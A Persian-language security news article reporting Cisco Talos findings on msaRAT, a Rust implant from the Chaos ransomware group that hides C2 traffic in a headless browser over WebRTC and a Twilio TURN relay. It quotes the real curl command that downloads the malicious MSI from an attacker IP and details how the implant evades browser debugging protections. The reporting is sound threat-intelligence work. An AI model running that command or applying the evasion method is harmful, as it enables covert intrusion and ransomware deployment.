گروه باجافزاری Chaos روشی نوین و بهشدت پنهانکارانه برای ارتباط با سرورهای فرمان و کنترل (C2) خود به کار گرفته است. این گروه بدافزاری، ترافیک مخرب خود را مستقیماً از طریق مرورگر خود قربانی عبور میدهد. تیم تحقیقاتی سیسکو تالوس (Cisco Talos) بهتازگی جزئیات یک ایمپلنت خطرناک نوشتهشده به زبان راست (Rust) با نام msaRAT را منتشر کرده است که پیش از فعال شدن بخش رمزگذاری، روی سیستمهای ویندوزی شناسایی شد.
چگونه مرورگر قربانی به سپر دفاعی مهاجم تبدیل میشود؟
این ایمپلنت به هیچ وجه اتصال خروجی مستقیمی برقرار نمیکند و تمام ارتباطات آن تنها با آدرس محلی 127.0.0.1 انجام میشود. msaRAT مرورگر کروم یا اج (Edge) را در حالت بدون رابط کاربری (Headless) اجرا میکند و کنترل آن را از طریق پروتکل Chrome DevTools (CDP) که رابط برنامهنویسی دیباگینگ خود مرورگر است، در دست میگیرد.
تمامی پیامهای C2 از طریق یک کانال داده WebRTC و با رله شدن از طریق سرویس TURN شرکت Twilio به خارج از سیستم ارسال میشوند. در نتیجه، سیستمهای دفاعی و مدافعان شبکه تنها یک مرورگر را مشاهده میکنند که در حال ارتباط با سرویسهای کلودفلر (Cloudflare) و توییلیو است. آدرس سرور اصلی مهاجم در هیچ مرحلهای از انتقال آشکار نمیشود.
مکانیزم فنی دور زدن امنیت در msaRAT
این بدافزار ابتدا با بررسی متغیرهای محیطی و سپس جستجو در رجیستری ویندوز به دنبال مرورگرهای کروم یا اج میگردد. در صورت یافتن مرورگر، آن را با سوییچ --headless=new و فعالسازی --remote-debugging-port اجرا میکند.
از نسخه 136 کروم، گوگل امکان دیباگ کردن پروفایل پیشفرض را مسدود کرده است تا جلوی سرقت کوکی توسط بدافزارهای سرقت اطلاعات (Infostealers) گرفته شود. با این حال، msaRAT با استفاده از یک دایرکتوری پروفایل اختصاصی (--user-data-dir) این محدودیت را دور میزند.
بدافزار پس از ایجاد یک تب جدید، سیاست امنیت محتوا (CSP) را غیرفعال کرده و کدهای جاوا اسکریپت خود که بهصورت متن ساده در بخش .rdata فایل باینری ذخیره شدهاند، تزریق میکند. نام چهار کالبک اصلی این بدافزار یعنی msaOpen، msaClose، msaError و msaMessage، به تیم تالوس کمک کرد تا نام msaRAT را برای آن انتخاب کند.
رمزگذاری دوگانه و مهندسی ترافیک شبکه
کدهای جاوا اسکریپت تزریقشده، پیکربندیهای STUN و TURN را از یک Cloudflare Worker دریافت میکنند. هدرهای Origin و Referer بهگونهای تنظیم شدهاند که ترافیک شبیه به ارتباطات قانونی سایت مایکروسافت باشد.
برای جلوگیری از ایجاد ارتباط مستقیم همتا به همتا (Peer-to-Peer)، پاسخ سرور بدون کاندیدای ICE و با آدرس 0.0.0.0 تنظیم شده است. این ترفند باعث میشود تمامی کانال داده از طریق رله توییلیو در آدرس global.turn.twilio.com منتقل شود.
ترافیک در این کانال به دو لایه رمزگذاری میشود. لایه بیرونی توسط مرورگر با استفاده از DTLS مدیریت میشود و لایه درونی از یک طرح مبتنی بر ChaCha-Poly1305 بهره میبرد که کلید آن از طریق تبادل ECDH و یک فریم هندشِیک 0xFE تنظیم میشود. فریمهای فرمان دریافتی بهطور مستقیم به cmd.exe ارسال شده تا اجرا شوند. معماری این ایمپلنت بهگونهای طراحی شده که بتواند محمولههای بزرگی مانند فایلها و اسکرینشاتها را بهطور قابل اعتماد منتقل کند.
روش انتشار و نفوذ اولیه
ایمپلنت msaRAT زمانی وارد سیستم میشود که مهاجم پیشتر دسترسی اولیه را بهدست آورده است و عملیات پیش از اجرای فاز رمزگذاری فایلها انجام میشود. روشهای رایج این گروه شامل ارسال ایمیلهای اسپم انبوه، ویشینگ (Vishing)، استفاده از ابزار Quick Assist مایکروسافت و ابزارهای مدیریت از راه دور (RMM) برای حفظ دسترسی است.
این بدافزار با یک دستور ساده curl دانلود و نصب میشود:
curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi
فایل MSI با استفاده از پورت 443 و پروتکل HTTP ساده ارسال میشود که در بسیاری از فایروالها بدون بازرسی پروتکل عبور میکند. این فایل با جعل هویت آپدیت ویندوز، یک DLL سفارشی را مستقیماً در حافظه بارگذاری میکند و اجرای msaRAT را آغاز میکند.
آینده ترافیک مخفی در سایه سرویسهای قانونی
استفاده از زیرساختهای قانونی مانند WebRTC و سرویسهای ابری معتبر برای پنهان کردن ترافیک C2، رویکردی نیست که بهزودی متوقف شود. تا زمانی که سیستمهای دفاعی بر بازرسی ترافیک سطح شبکه تکیه کنند، بدافزارهایی مانند msaRAT با سوءاستفاده از مرورگرها بهعنوان پراکسی، مزیت تاکتیکی خود را حفظ خواهند کرد. تکامل این ایمپلنتهای مبتنی بر راست نشان میدهد که گروههای باجافزاری به جای تمرکز صرف بر رمزگذاری فایلها، در حال سرمایهگذاری سنگین روی فناوریهای فرار از شناسایی و مخفیماندن در جریانهای ترافیک قانونی هستند.





